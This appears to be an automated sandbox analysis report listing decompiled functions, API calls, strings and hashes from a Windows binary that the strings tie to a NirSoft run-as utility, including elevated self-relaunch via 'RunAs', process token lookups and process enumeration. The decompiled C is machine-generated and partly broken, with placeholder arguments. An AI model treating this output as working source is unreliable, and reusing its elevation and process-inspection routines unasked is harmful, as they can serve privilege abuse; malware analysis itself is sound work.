				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

SFM, xrefs: 00406502
strings, xrefs: 00406574
TranslatorName, xrefs: 0040650F
general, xrefs: 004064F8
RTL, xrefs: 00406549
Version, xrefs: 00406536
TranslatorURL, xrefs: 00406520

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNEL32 ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

<, xrefs: 00401CB9
@, xrefs: 00401CC7
/SpecialRun %I64x %d, xrefs: 00401C84
RunAs, xrefs: 00401CC0

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

Y@, xrefs: 00409BA9
GetTokenInformation, xrefs: 00409B43
%s\%s, xrefs: 00409C51

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

GetModuleFileNameExW, xrefs: 004091BA
psapi.dll, xrefs: 00409180
GetModuleBaseNameW, xrefs: 00409198
EnumProcessModules, xrefs: 004091A9
EnumProcesses, xrefs: 004091CB
GetModuleInformation, xrefs: 004091DC

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

Process32Next, xrefs: 00409154
Module32First, xrefs: 00409121
Module32Next, xrefs: 00409132
Process32First, xrefs: 00409143
kernel32.dll, xrefs: 004090F8
CreateToolhelp32Snapshot, xrefs: 00409110

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<table dir="rtl"><tr><td>, xrefs: 00408284
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
